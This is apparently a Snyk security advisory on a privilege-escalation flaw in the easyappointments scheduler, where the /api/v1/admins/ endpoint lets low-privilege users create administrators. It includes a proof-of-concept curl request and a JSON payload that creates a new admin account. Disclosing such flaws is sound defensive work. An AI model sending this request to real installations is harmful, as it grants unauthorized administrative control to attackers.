Privilege Escalation Affecting alextselegidis/easyappointments Open this link in a new tab package, versions >=0.0.0


0.0
high
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    Low

  • Confidentiality

    High

  • Integrity

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-PHP-ALEXTSELEGIDISEASYAPPOINTMENTS-2813631

  • published

    11 May 2022

  • disclosed

    11 May 2022

  • credit

    Francesco Carlucci

How to fix?

A fix was pushed into the master branch but not yet published.

Overview

alextselegidis/easyappointments is a powerful Open Source Appointment Scheduler that can be installed on your server.

Affected versions of this package are vulnerable to Privilege Escalation via the /api/v1/admins/ endpoint, when the authorization is checked against the user's existence without validation of the user's permissions. Exploiting this vulnerability allows a low privileged user to create a new admin user.

PoC:

curl --request POST https://easyappointments.org/index.php/api/v1/admins/ -d @payload.json --user user:pass

payload.json :

{
        "id": 100,
        "firstName": "Admin",
        "lastName": "Admin",
        "email": "admin@easyappointments.org",
        "mobile": null,
        "phone": "111",
        "address": null,
        "city": null,
        "state": null,
        "zip": null,
        "notes": null,
        "timezone": "UTC",
        "settings": {
            "username": "usern@me",
            "password": "p@ssw0rd",
            "notifications": true,
            "calendarView": "default"
        }
    }

References